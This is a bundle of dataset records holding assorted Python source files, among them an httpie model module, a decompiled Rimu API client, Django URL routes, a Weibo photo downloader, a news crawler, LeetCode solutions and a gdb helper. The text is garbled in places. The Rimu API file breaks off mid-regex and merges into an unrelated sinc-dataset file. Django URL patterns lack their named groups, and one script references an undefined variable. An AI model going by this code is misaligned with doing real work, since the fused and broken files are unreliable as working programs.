{"seq_id":"327139168","text":"#!/usr/bin/env python\n#-*- encoding:utf8 -*-\n# File Name:t.py\n# Author:ul1n(linlin152@foxmail.com)\n# Time: 2018-10-31 Wednesday 15:06:25\n\nimport asyncio\nimport os\nimport sys\n\nfrom mworker.manager import WorkerManager, WorkerType\nfrom mworker.utils import get_logger\n\n\ndev = True\n\nlog = get_logger('examples.mymanager.MyManager')\n\ncwd = os.getcwd()\n\nclass MyManager(WorkerManager):\n\n    def __init__(self):\n        self._check_timeout = 10\n        if not dev:\n            config = dict(\n                tag='myworker',\n                rds_config={\n                    'host':'r3d1s',\n                    'db': 7,\n                    'port':6379,\n                },\n                image='myworker',\n                command='python3 -m examples.myworker',\n                network='redis_default',\n                hostwd=cwd\n            )\n            super(MyManager, self).__init__(WorkerType.CONTAINER, **config)\n        else:\n            config = dict(\n                tag='myworker',\n                rds_config={\n                    'host': 'r3d1s',\n                    'db': 7,\n                    'port': 6379,\n                },\n                command='gnome-terminal -- python3 -m examples.myworker',\n                hostwd=cwd\n            )\n            super(MyManager, self).__init__(WorkerType.PROCESS, **config)\n        self._count = 0\n\n    async def _setup(self):\n        await super(MyManager, self)._setup()\n        self.set_setup_done()\n\n    def _gen_worker_id(self):\n        self._count += 1\n        return 'zone'+ str(self._count)\n\n    async def check(self):\n        wcount = await self.cache.get_all_worker_id()\n        log.info(wcount)\n        self._count = len(wcount)\n        if self._count == 0:\n            wid = self._gen_worker_id()\n            args = dict(name='worker1', count=3)\n            await self.cache.set_worker_args(wid, args, jsn=True)\n            self.start_worker(wid)\n            wid = self._gen_worker_id()\n            args = dict(name='worker2', count=3)\n            await self.cache.set_worker_args(wid, args, jsn=True)\n            self.start_worker(wid)\n\n        await asyncio.sleep(0.01)\n        if self.should_log():\n            log.info('checking')\n\n\ndef main():\n    m = MyManager()\n    try:\n        
m.start()\n except KeyboardInterrupt as e:\n log.info('exit by user')\n asyncio.ensure_future(m.stop())\n log.info('exited')\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"examples/mymanager.py","file_name":"mymanager.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"598101500","text":"import os\nimport sys\nfrom requests.compat import urlparse, is_windows, bytes, str\n\n\nclass Environment(object):\n \"\"\"Holds information about the execution context.\n\n Groups various aspects of the environment in a changeable object\n and allows for mocking.\n\n \"\"\"\n\n #noinspection PyUnresolvedReferences\n is_windows = is_windows\n\n progname = os.path.basename(sys.argv[0])\n if progname not in ['http', 'https']:\n progname = 'http'\n\n stdin_isatty = sys.stdin.isatty()\n stdin = sys.stdin\n stdout_isatty = sys.stdout.isatty()\n stdout = sys.stdout\n stderr = sys.stderr\n\n # Can be set to 0 to disable colors completely.\n colors = 256 if '256color' in os.environ.get('TERM', '') else 88\n\n def __init__(self, **kwargs):\n self.__dict__.update(**kwargs)\n\n def init_colors(self):\n # We check for real Window here, not self.is_windows as\n # it could be mocked.\n if (is_windows and not self.__colors_initialized\n and self.stdout == sys.stdout):\n import colorama.initialise\n self.stdout = colorama.initialise.wrap_stream(\n self.stdout, autoreset=False,\n convert=None, strip=None, wrap=True)\n self.__colors_initialized = True\n __colors_initialized = False\n\n\nclass HTTPMessage(object):\n \"\"\"Model representing an HTTP message.\"\"\"\n\n def __init__(self, orig):\n self._orig = orig\n\n @property\n def content_type(self):\n return str(self._orig.headers.get('Content-Type', ''))\n\n\nclass HTTPResponse(HTTPMessage):\n \"\"\"A `requests.models.Response` wrapper.\"\"\"\n\n def __iter__(self):\n mb = 1024 * 1024\n return self._orig.iter_content(chunk_size=2 * mb)\n\n @property\n def line(self):\n \"\"\"Return Status-Line\"\"\"\n original = self._orig.raw._original_response\n return str('HTTP/{version} {status} {reason}'.format(\n version='.'.join(str(original.version)),\n status=original.status,\n reason=original.reason\n ))\n\n @property\n def headers(self):\n return str(self._orig.raw._original_response.msg)\n\n @property\n def encoding(self):\n return self._orig.encoding or 'utf8'\n\n @property\n def body(self):\n # Only now the response body is fetched.\n # Shouldn't be touched unless the body is actually needed.\n return self._orig.content\n\n\nclass HTTPRequest(HTTPMessage):\n \"\"\"A `requests.models.Request` wrapper.\"\"\"\n\n def __iter__(self):\n yield self.body\n\n @property\n def line(self):\n \"\"\"Return Request-Line\"\"\"\n url = urlparse(self._orig.url)\n\n # Querystring\n qs = ''\n if url.query or self._orig.params:\n qs = '?'\n if url.query:\n qs += url.query\n # Requests doesn't make params part of ``request.url``.\n if self._orig.params:\n if url.query:\n qs += '&'\n #noinspection PyUnresolvedReferences\n qs += type(self._orig)._encode_params(self._orig.params)\n\n # Request-Line\n return str('{method} {path}{query} HTTP/1.1'.format(\n method=self._orig.method,\n path=url.path or '/',\n query=qs\n ))\n\n @property\n def headers(self):\n headers = dict(self._orig.headers)\n content_type = headers.get('Content-Type')\n\n if isinstance(content_type, bytes):\n # Happens when uploading files.\n # TODO: submit a bug report for Requests\n headers['Content-Type'] = 
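One hazard in the main() of the mymanager example above: asyncio.ensure_future(m.stop()) only schedules the coroutine, and once start() has been interrupted the event loop may no longer be running, so the cleanup can silently never execute. A minimal sketch of a safer shutdown using only stdlib asyncio — run_forever and shutdown are hypothetical stand-ins for the mworker calls:

```python
import asyncio

async def run_forever():
    # Stand-in for the manager's main loop (hypothetical).
    while True:
        await asyncio.sleep(1)

async def shutdown():
    # Stand-in for m.stop() (hypothetical cleanup).
    await asyncio.sleep(0)

def main():
    loop = asyncio.new_event_loop()
    try:
        loop.run_until_complete(run_forever())
    except KeyboardInterrupt:
        # Actually *run* the cleanup to completion; ensure_future() alone
        # only schedules it, and a stopped loop never executes it.
        loop.run_until_complete(shutdown())
    finally:
        loop.close()

if __name__ == '__main__':
    main()
```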
str(content_type)\n\n if 'Host' not in headers:\n headers['Host'] = urlparse(self._orig.url).netloc\n\n return '\\n'.join('%s: %s' % (name, value)\n for name, value in headers.items())\n\n @property\n def encoding(self):\n return 'utf8'\n\n @property\n def body(self):\n \"\"\"Reconstruct and return the original request body bytes.\"\"\"\n if self._orig.files:\n # TODO: would be nice if we didn't need to encode the files again\n # FIXME: Also the boundary header doesn't match the one used.\n for fn, fd in self._orig.files.values():\n # Rewind the files as they have already been read before.\n fd.seek(0)\n body, _ = self._orig._encode_files(self._orig.files)\n else:\n try:\n body = self._orig.data\n except AttributeError:\n # requests < 0.12.1\n body = self._orig._enc_data\n\n if isinstance(body, dict):\n #noinspection PyUnresolvedReferences\n body = type(self._orig)._encode_params(body)\n\n if isinstance(body, str):\n body = body.encode('utf8')\n\n return body\n","sub_path":"httpie/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"575686879","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/rimuapi.py\n# Compiled at: 2015-03-24 11:50:03\nimport urllib, os\nfrom requests import Request, Session\ntry:\n import json\nexcept:\n import simplejson as json\n\ndef sort_uniq(sequence):\n import itertools, operator\n return itertools.imap(operator.itemgetter(0), itertools.groupby(sorted(sequence)))\n\n\ndef valid_domain_name(domain_name):\n import re\n if len(domain_name) > 255:\n return False\n domain_name.rstrip('.')\n allowed = re.compile('(?!-)[A-Z\\\\d-]{1,63}(? 0]) / X[X > 0]).tolist())\n\n\t\tX = numpy.reshape(X, (-1, 1))\n\t\tY = numpy.reshape(Y, (-1, 1))\n\n\t\tself.train_x = X\n\t\tself.train_y = Y\n\n\t\tX = numpy.array(numpy.arange(-30, 0, 0.01).tolist() + [0.0] + numpy.arange(0.01, 30.01, 0.01).tolist())\n\t\tY = numpy.array((numpy.sin(X[X < 0]) / X[X < 0]).tolist() + [1.0] + (numpy.sin(X[X > 0]) / X[X > 0]).tolist())\n\n\t\tX = numpy.reshape(X, (-1, 1))\n\t\tY = numpy.reshape(Y, (-1, 1))\n\t\t\n\t\tself.test_x = X\n\t\tself.test_y = Y","sub_path":"Experiments/FFNN/MLELM/Datasets/Sinc.py","file_name":"Sinc.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"187268714","text":"from django.conf.urls import url\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom . 
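The Sinc dataset above splices the x == 0 point in by hand to dodge the division by zero. A sketch of an equivalent construction with numpy.sinc — note that numpy's sinc is the *normalised* form, sin(pi*x)/(pi*x), so the argument is rescaled by pi to recover sin(x)/x:

```python
import numpy as np

# np.sinc(x / pi) == sin(x) / x, and it already evaluates to 1.0 at
# x == 0, removing the need to stitch the singular point in manually.
X = np.arange(-10, 10.01, 0.05).reshape(-1, 1)
Y = np.sinc(X / np.pi)

# The sample nearest zero comes out as exactly 1.0 (the limit value).
assert np.isclose(Y[np.isclose(X, 0.0)], 1.0).all()
```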
import views\n\nouter_list = views.OuterViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nouter_detail = views.OuterViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\ninner_list = views.InnerViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\ninner_detail = views.InnerViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nplaylist_list = views.PlaylistViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nplaylist_detail = views.PlaylistViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nurlpatterns = format_suffix_patterns([\n url(r'outer/$', outer_list, name='outer_list'),\n url(r'outer/(?P[0-9]+)/$', outer_detail, name='outer_detail'),\n url(r'inner/$', inner_list, name='inner_list'),\n url(r'inner/(?P[0-9]+)/$', inner_detail, name='inner_detail'),\n url(r'playlist/$', playlist_list, name='playlist_list'),\n url(r'playlist/(?P[0-9]+)/$', playlist_detail, name='playlist_detail'),\n url(r'$', views.api_root),\n])\n","sub_path":"django_base/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"353299295","text":"#!/usr/bin/python\n\nimport math\nimport matplotlib.pyplot as plt\n\n\ndef g():\n return 9.80665\n\n\ndef euler(theta, tf, dt, vf = 0):\n sin_t = math.sin(theta)\n t = 0.0\n y = 0.0\n v = 0.0\n y_vec = []\n v_vec = []\n t_vec = []\n while(t <= tf):\n y += v*dt\n v += g()*sin_t*dt\n if vf != 0:\n v *= (1-(v/vf))\n y_vec.append(y)\n v_vec.append(v)\n t_vec.append(t)\n t += dt\n return y_vec, v_vec, t_vec\n\n\ndef euler_cromer(theta, tf, dt, vf = 0):\n sin_t = math.sin(theta)\n t = 0.0\n y = 0.0\n v = 0.0\n y_vec = []\n v_vec = []\n t_vec = []\n while(t <= tf):\n v += g()*sin_t*dt\n if vf != 0:\n v *= (1-(v/vf))\n y += v*dt\n y_vec.append(y)\n v_vec.append(v)\n t_vec.append(t)\n t += dt\n return y_vec, v_vec, t_vec\n\n\n#------------------------------------------------------------------------------\n\n# Dados iniciais\ntheta = 0.122173 # 7 graus\ntf = 6.0\ndt = 0.1\n\n# Mude esta linha para obter diferentes constantes de atrito\nvf = 40 # velocidade terminal (0: sem resistência)\n\npos, vel, t = euler(theta, tf, dt, vf)\npos_c, vel_c, t_c = euler_cromer(theta, tf, dt, vf)\n\n# Euler\nplt.plot(t, pos, label = \"Posição (m)\")\nplt.plot(t, vel, label = \"Velocidade (m/s)\")\n\n# Euler-Cromer\nplt.plot(t_c, pos_c, label = \"Posição - Cromer (m)\")\nplt.plot(t_c, vel_c, label = \"Velocidade - Cromer (m/s)\")\n\n# Dados coletados\ndata = [0.0, 2.6, 4.08, 5.18, 5.88]\ny = [0.0, 2.5, 5, 7.5, 10.0]\nplt.plot(data, y, 's', label = \"Posição coletada (m)\")\n\nplt.legend(loc=2)\nplt.xlabel('Tempo (s)')\nplt.show()\n","sub_path":"Old/6º Semestre/Modelagem & Simulação/EP2/rampa.py","file_name":"rampa.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"480377909","text":"# Подсчитать, сколько было выделено памяти под переменные в ранее разработанных программах\n# в рамках первых трех уроков. 
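The hand-written as_view() mappings in the urls.py above are exactly what DRF's routers generate automatically. A sketch of the same wiring with DefaultRouter — assuming a reasonably recent DRF (the basename keyword) and ModelViewSet-style view sets; format suffixes and the api_root view are also provided by the router:

```python
# Router-based rewiring of the same three view sets; the list/detail
# action mappings above are generated for us.
from rest_framework.routers import DefaultRouter
from . import views

router = DefaultRouter()
router.register(r'outer', views.OuterViewSet, basename='outer')
router.register(r'inner', views.InnerViewSet, basename='inner')
router.register(r'playlist', views.PlaylistViewSet, basename='playlist')

urlpatterns = router.urls
```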
Проанализировать результат и определить программы с наиболее\n# эффективным использованием памяти.\n\nimport sys\n\n# Урок 3, задача 8\n# Матрица 5x4 заполняется вводом с клавиатуры кроме последних элементов строк.\n# Программа должна вычислять сумму введенных элементов каждой строки и записывать ее\n# в последнюю ячейку строки. В конце следует вывести полученную матрицу.\n\na = []\n\nfor i in range(5):\n b = []\n for j in range(3):\n b.append(int(input(f'Введите элемент {i + 1}-{j + 1}: ')))\n b.append(b[0] + b[1] + b[2])\n a.append(b)\n\nfor i in range(5):\n print()\n for j in range(4):\n print(a[i][j], end=' ')\n\n\n# подсчет памяти\nsum_var = sys.getsizeof(a) + sys.getsizeof(b) + sys.getsizeof(i) + sys.getsizeof(j)\nprint(sum_var)\n\n# Python 3.9.5\n# Windows, 64-разрядная ОС\n\n# Запуск позволил определить, что объем памяти - 264 байта\n# Под списки отведено 120 и 88 байт, под остальные переменные (int) - 28 байт\n# Объем под переменные зависит от счетчика ссылок на объект, ссылки на тип объекта, версии Python\n\n# Общие выводы в первой задаче\n","sub_path":"dz6_task2.py","file_name":"dz6_task2.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"55617757","text":"import json\nfrom botocore.vendored import requests\nfrom python.shared import BeautifulSoup\n\ndef news(event, context):\n\n result = requests.get('https://www.inside.com.tw/?page=1')\n\n html = result.text\n\n soup = BeautifulSoup(html, 'html.parser')\n\n # delete special div in index\n if soup.find('div',class_='Independent_study'):\n soup.find('div',class_='Independent_study').decompose()\n\n if soup.find('div',class_='Independent_study_down'):\n soup.find('div',class_='Independent_study_down').decompose()\n\n posts = soup.find_all('div',class_='post_list_item')\n resp=[]\n\n for item in posts:\n # print(item)\n obj = item.find('a', class_='js-auto_break_title')\n if not isinstance(obj,type(None)):\n resp.append({\n 'title':item.find('a', class_='js-auto_break_title').text,\n 'url': item.find('a', class_='js-auto_break_title')['href'],\n 'description':item.find('p', class_='post_description').text\n })\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(resp)\n }\n\n return response\n","sub_path":"api/crawler/inside.py","file_name":"inside.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"566341755","text":"# -*- coding: UTF-8 -*-\n# ver: Python-2.7.10\n\nimport urllib\nimport os\nimport sys\nimport datetime\nimport json\n\n# progressbar-2.3\nfrom progressbar import ProgressBar\n\nimport func\nfunc.init()\n\n# path:\ndownPath = func.downPath + 'weibo\\\\'\n\n# name:\ncookieFileName = 'weibo.txt'\n\n# URL:\nhostURL = 'http://photo.weibo.com/'\nalbumGetURL = '/albums/get_all?'\nphotoGetURL = hostURL + 'photos/get_all?'\nlargePicURL = 'http://ww4.sinaimg.cn/large/'\n\nif not os.path.isdir(downPath):\n os.mkdir(downPath)\n \n# get cookie & make headers\nif not os.path.isfile(func.cookiePath + cookieFileName):\n print('cookie file not found...(%s)' % (func.cookiePath + cookieFileName))\n sys.exit()\nfp = open(func.cookiePath + cookieFileName)\ncookie = fp.readline()\nfp.close()\nheaders = func.headers_for_urllib2\nheaders['Cookie'] = cookie\n \n# get WeiboUID\nWeiboUID = input('input WeiboUID:')\n\n# get Albums from index\nindex = json.loads(func.getJSHtml(hostURL + str(WeiboUID) + albumGetURL, headers = headers))\n\n# 
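A caveat worth knowing about the measurement above: sys.getsizeof is shallow — for a list it counts only the list object and its pointer array, not the inner rows or the ints inside them. A sketch of a deep count:

```python
import sys

def total_size(obj, seen=None):
    # Recursively sum sys.getsizeof over nested lists/tuples/sets/dicts;
    # `seen` guards against counting shared references twice.
    seen = seen if seen is not None else set()
    if id(obj) in seen:
        return 0
    seen.add(id(obj))
    size = sys.getsizeof(obj)
    if isinstance(obj, dict):
        size += sum(total_size(k, seen) + total_size(v, seen)
                    for k, v in obj.items())
    elif isinstance(obj, (list, tuple, set)):
        size += sum(total_size(item, seen) for item in obj)
    return size

matrix = [[1, 2, 3, 6], [4, 5, 6, 15]]
print(total_size(matrix))  # counts the inner lists and the ints too
```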
prepare to download\nif index['data']['total'] == 0:\n    print('WeiboUID error or no such UID')\n    sys.exit()\nif not os.path.isdir(downPath + str(WeiboUID)):\n    os.mkdir(downPath + str(WeiboUID))\ndownPath = downPath + str(WeiboUID) + '\\\\'\n\n# get photoName in each Albums and download\nprint('downloading...')\nfor album in index['data']['album_list']:\n    newPhotoCount = 0\n    if not os.path.isdir(downPath + album['caption']):\n        os.mkdir(downPath + album['caption'])\n    print('albumName:%s\\ncount:%d' % (album['caption'], album['count']['photos']))\n    \n    photoCount = album['count']['photos']\n    progress = ProgressBar(maxval = album['count']['photos'])\n    progress.start()\n    count = 0\n    page = 1\n    while photoCount > 0:\n        photos = json.loads(func.getJSHtml(photoGetURL +\n                                           'uid=' + str(WeiboUID) +\n                                           '&album_id=' + str(album['album_id']) +\n                                           '&count=100' +\n                                           '&type=' + str(album['type']) +\n                                           '&page=' + str(page),\n                                           headers = headers))\n        for photo in photos['data']['photo_list']:\n            if not os.path.isfile(downPath + album['caption'] + '\\\\%s.jpg' % (photo['photo_id'])):\n                imgurl = largePicURL + photo['pic_name']\n                urllib.urlretrieve(imgurl, downPath + album['caption'] + '\\\\%s.jpg' % (photo['photo_id']))\n                newPhotoCount += 1\n            count += 1\n            progress.update(count)\n        photoCount -= 100\n        page += 1\n    progress.finish()\n    print('new pic count:%d\\n' % (newPhotoCount))\n\nfp = open(downPath + 'log.txt', 'a+')\nhomePage = func.getJSHtml(hostURL + str(WeiboUID), headers = headers)\nname = func.dealHtml(nameRE, homePage)[0]\nfp.write('time:%s\\nname:%s\\n\\n' % (datetime.datetime.now(), name))\nfp.close()\n","sub_path":"Python/ImageDownloader/Weibo_Albums.py","file_name":"Weibo_Albums.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"576581351","text":"#!/bin/python3\n\nimport sys\n\n\ndef staircase(n):\n    for i in range(n):\n        for j in range(n - i - 1):\n            print(\" \", end=\"\")\n        for k in range(i + 1):\n            print(\"#\", end=\"\")\n        print()\n\n\n\nif __name__ == \"__main__\":\n    n = int(input().strip())\n    staircase(n)\n","sub_path":"Leetcode_test/2_printTrankle.py","file_name":"2_printTrankle.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"512977502","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\n__author__ = \"Andrew Bian\"\n\nimport xml.etree.ElementTree as ET\nimport logging\nfrom platform import system\n\nif system() == 'Windows':\n    path_prefix = __file__[:__file__.rfind('\\\\') + 1] + '../'\nelse:\n    path_prefix = __file__[:__file__.rfind('/') + 1] + '../'\n\n\nDATAPATH = {\n    'sbgv_daily_status_path': path_prefix + 'data/sbgv/daily_status/',\n    'sbgv_daily_inflow_path': path_prefix + 'data/sbgv/daily_inflow/',\n    'sbgv_daily_outflow_path': path_prefix + 'data/sbgv/daily_outflow/',\n    'sbgv_yearly': path_prefix + 'data/sbgv/yearly/',\n    'sbgv_all': path_prefix + 'data/sbgv/',\n    'sbg_daily_status_path': path_prefix + 'data/sbg/daily_status/',\n    'sbg_daily_inflow_path': path_prefix + 'data/sbg/daily_inflow/',\n    'sbg_daily_outflow_path': path_prefix + 'data/sbg/daily_outflow/',\n    'sbg_yearly': path_prefix + 'data/sbg/yearly/',\n    'sbg_all': path_prefix + 'data/sbg/',\n    'issue': path_prefix + 'data/issue_data/',\n}\n\n# ------------------------------------------------------------------------\n# storage api functions\n# 
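The staircase above can also be written with one string operation per row; str.rjust pads on the left, producing the same right-aligned figure without the inner loops:

```python
def staircase(n):
    # '#' * i builds the step, rjust(n) left-pads it with spaces.
    for i in range(1, n + 1):
        print(('#' * i).rjust(n))

staircase(4)
# Output:
#    #
#   ##
#  ###
# ####
```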
------------------------------------------------------------------------\n\n\n\ndef get_day_trlist(in_date, category, tag):\n filepath = build_path(in_date, category, tag)\n return get_trlist(filepath)\n\n\ndef get_day_trnum(in_date, category, tag):\n root = get_rootele(in_date, category, tag)\n elements = root.find('elements')\n row_num = len(elements.findall('row'))\n return row_num\n\n\ndef get_day_trlist_raw(in_date, category):\n filepath = build_path(in_date, category)\n return ET.parse(filepath)\n\n\ndef write_day_trlist_raw(in_date, category, data):\n filepath = build_path(in_date, category)\n data.write(filepath)\n\n\n# x stands for get data from yearly data file\ndef get_year_trlist(year, tag):\n filepath = build_path_year(year, tag)\n return get_trlist(filepath)\n\n\ndef get_all_trlist(tag):\n filepath = build_path_all(tag)\n return get_trlist(filepath)\n\ndef get_issue_list():\n filepath = build_path_issue()\n return get_trlist(filepath)\n\n# ------------------------------------------------------------------------\n# helper functions\n# ------------------------------------------------------------------------\n\n\ndef get_trlist(filepath):\n tree = ET.parse(filepath)\n root = tree.getroot()\n treedict = xml_to_dict(root[1])\n rawtrs = treedict.values()[0]\n rawtrs = [rawtr['row'] for rawtr in rawtrs]\n trlist = [build_trobject(rawtr) for rawtr in rawtrs]\n return trlist\n\n\ndef build_path(in_date, category, tag):\n return DATAPATH[tag + '_' + category + '_path'] + in_date.isoformat() + \".xml\"\n\n\ndef build_path_all(tag):\n return DATAPATH[tag + '_' + 'all'] + 'all.xml'\n\ndef build_path_issue():\n return DATAPATH['issue'] + 'issue.xml'\n\ndef build_path_year(year, tag):\n return DATAPATH[tag + '_' + 'yearly'] + str(year) + '.xml'\n\n\ndef get_rootele(in_date, category, tag):\n filepath = DATAPATH[tag + '_' + category + '_path'] + in_date.isoformat() + \".xml\"\n tree = ET.parse(filepath)\n root = tree.getroot()\n return root\n\n\ndef xml_to_dict(el):\n d = {}\n if el.text:\n d[el.tag] = el.text\n else:\n d[el.tag] = {}\n children = el.getchildren()\n if children:\n d[el.tag] = [xml_to_dict(child) for child in children]\n return d\n\n\ndef build_trobject(rawtr):\n tr = {}\n for column in rawtr:\n tr[column['column'][0]['name']] = column['column'][1]['value']\n return tr\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"tr_statistics/module/storage_xml.py","file_name":"storage_xml.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127286147","text":"\nfrom django.shortcuts import render, get_object_or_404, redirect, Http404\nfrom django.contrib.admin.views.decorators import staff_member_required\n\nfrom .forms import ArticleCreateForm, ArticleEditForm\nfrom .models import Article\nfrom .filters import slugify\n\n\n# Create your views here.\n\n\ndef home_view(request):\n head_title = \"Blog\"\n main_head = \"Blog\"\n article = Article.objects.order_by('num_views').last()\n context = {\n \"main_head\": main_head,\n \"head_title\": head_title,\n 'article': article,\n }\n return render(request, 'home.html', context)\n\n#CRUD (with list as part of retieve)\n#Create\n@staff_member_required\ndef article_create_view(request):\n form = ArticleCreateForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.slug = slugify(form.cleaned_data['title'])\n obj.author = request.user\n obj.save()\n form = ArticleCreateForm()\n\n head_title = 
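A self-contained demo of the element-to-dict recursion used by storage_xml above, run against an in-memory document (the sbg/sbgv data files are not needed); it also iterates the element directly, since Element.getchildren() was removed in Python 3.9:

```python
import xml.etree.ElementTree as ET

def xml_to_dict(el):
    # Leaf elements map tag -> text; container elements map
    # tag -> list of recursively converted children.
    d = {}
    if el.text and el.text.strip():
        d[el.tag] = el.text
    else:
        d[el.tag] = [xml_to_dict(child) for child in el] or {}
    return d

root = ET.fromstring('<row><column><name>id</name><value>7</value></column></row>')
print(xml_to_dict(root))
# {'row': [{'column': [{'name': 'id'}, {'value': '7'}]}]}
```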
\"Create Article\"\n main_head = \"Create Article\"\n\n context = {\n 'form': form,\n \"head_title\": head_title,\n \"main_head\": main_head,\n }\n return render(request, 'article_create.html', context)\n\n\n#Retrieve\ndef article_detail_view(request, slug):\n article = get_object_or_404(Article, slug=slug)\n article.num_views += 1\n article.save()\n head_title = article.title\n main_head = \"Selected Article:\"\n context = {\n \"article\": article,\n \"head_title\": head_title,\n \"main_head\": main_head,\n }\n return render(request, 'article_detail.html', context)\n\n\n#List\ndef articles_view(request):\n queryset = Article.objects.all() if request.user.is_staff else Article.objects.published()\n head_title = \"Articles\"\n main_head = \"Articles\"\n context = {\n \"object_list\": queryset,\n \"head_title\": head_title,\n \"main_head\": main_head,\n }\n return render(request, 'articles.html', context)\n\n\n#Update\n@staff_member_required\ndef article_edit_view(request, slug):\n article = get_object_or_404(Article, slug=slug)\n if not request.user.is_superuser and request.user != article.author:\n raise Http404\n form = ArticleEditForm(request.POST or None, instance=article)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.slug = slugify(form.cleaned_data['title'])\n obj.save()\n return redirect(f\"/articles/{obj.slug}\")\n head_title = \"Edit Article\"\n main_head = \"Edit Article\"\n context = {\n \"article\": article,\n \"head_title\": head_title,\n \"main_head\": main_head,\n \"form\": form,\n }\n return render(request, 'article_edit.html', context)\n\n\n#Delete\n@staff_member_required\ndef article_delete_view(request, slug):\n article = get_object_or_404(Article, slug=slug)\n if not request.user.is_superuser and request.user != article.author:\n raise Http404\n if request.method == \"POST\":\n article.delete()\n return redirect(\"/articles\")\n head_title = \"Delete Article\"\n main_head = \"Delete Article\"\n context = {\n \"article\": article,\n \"head_title\": head_title,\n \"main_head\": main_head,\n }\n return render(request, 'article_delete.html', context)\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"163558451","text":"# Google # Amazon\n# https://leetcode.com/problems/minimum-difference-between-largest-and-smallest-value-in-three-moves/\n\n# O(n logn) time, O(1) space\nclass Solution:\n def minDifference(self, nums: List[int]) -> int:\n nums.sort()\n if len(nums) <= 4:\n return 0\n \n diff1 = nums[-1] - nums[3]\n diff2 = nums[-2] - nums[2]\n diff3 = nums[-3] - nums[1]\n diff4 = nums[-4] - nums[0]\n return min(diff1, diff2, diff3, diff4)\n\n# Optimization by creating priority queue for whole array\n# O(log n) time (from O(k log n) where k = 3), O(n) space \nimport heapq\nclass Solution:\n def minDifference(self, nums: List[int]) -> int:\n if len(nums) <= 4:\n return 0\n \n minus_nums = [-num for num in nums]\n heapq.heapify(nums)\n heapq.heapify(minus_nums)\n \n min1 = heapq.heappop(nums)\n min2 = heapq.heappop(nums)\n min3 = heapq.heappop(nums)\n min4 = heapq.heappop(nums)\n \n max1 = - heapq.heappop(minus_nums)\n max2 = - heapq.heappop(minus_nums)\n max3 = - heapq.heappop(minus_nums)\n max4 = - heapq.heappop(minus_nums)\n \n return min(max1-min4, max2-min3, max3-min2, max4-min1)\n\n# Alternative optimization by keeping a priority queue of size k (3)\n# Note, this approach is used by heapq.nlargest and 
heapq.nsmallest\n# O(n) time (from O(n log k)), O(n) space\nimport heapq\nclass Solution:\n def minDifference(self, nums: List[int]) -> int:\n if len(nums) <= 4:\n return 0\n maxs = heapq.nlargest(4, nums)\n mins = heapq.nsmallest(4, nums)\n return min(maxs[0]-mins[3], maxs[1]-mins[2], maxs[2]-mins[1], maxs[3]-mins[0])","sub_path":"leetcode/1509_MinimumDifferenceBetweenLargestAndSmallestValueInThreeMoves.py","file_name":"1509_MinimumDifferenceBetweenLargestAndSmallestValueInThreeMoves.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"35089804","text":"import gdb\n\nclass LogHeaderDbg (gdb.Command):\n \"\"\" \"\"\"\n loghdr_meta = []\n loghdr = []\n\n def __init__ (self):\n super (LogHeaderDbg, self).__init__ (\"lhdbg\",\n gdb.COMMAND_SUPPORT,\n gdb.COMPLETE_NONE)\n def invoke (self, args, from_tty):\n args = args.split()\n if len(args) < 1:\n print (\"usage: lhdbg [save/show] logheader_meta\")\n return\n\n if args[0] == \"save\":\n loghdr_meta = gdb.parse_and_eval(args[1])\n self.loghdr_meta.append(loghdr_meta)\n\n '''\n # example to access fields in struct\n print loghdr_meta.type\n for name, field in loghdr_meta.type.iteritems():\n print name, field\n '''\n\n loghdr = loghdr_meta['loghdr']\n self.loghdr.append(loghdr.dereference())\n\n #print loghdr_meta.dereference(loghdr_meta.loghdr)\n elif args[0] == \"show\":\n for i, l in enumerate(self.loghdr_meta):\n print (\"index - \", i)\n print (\"loghdr_meta: \", 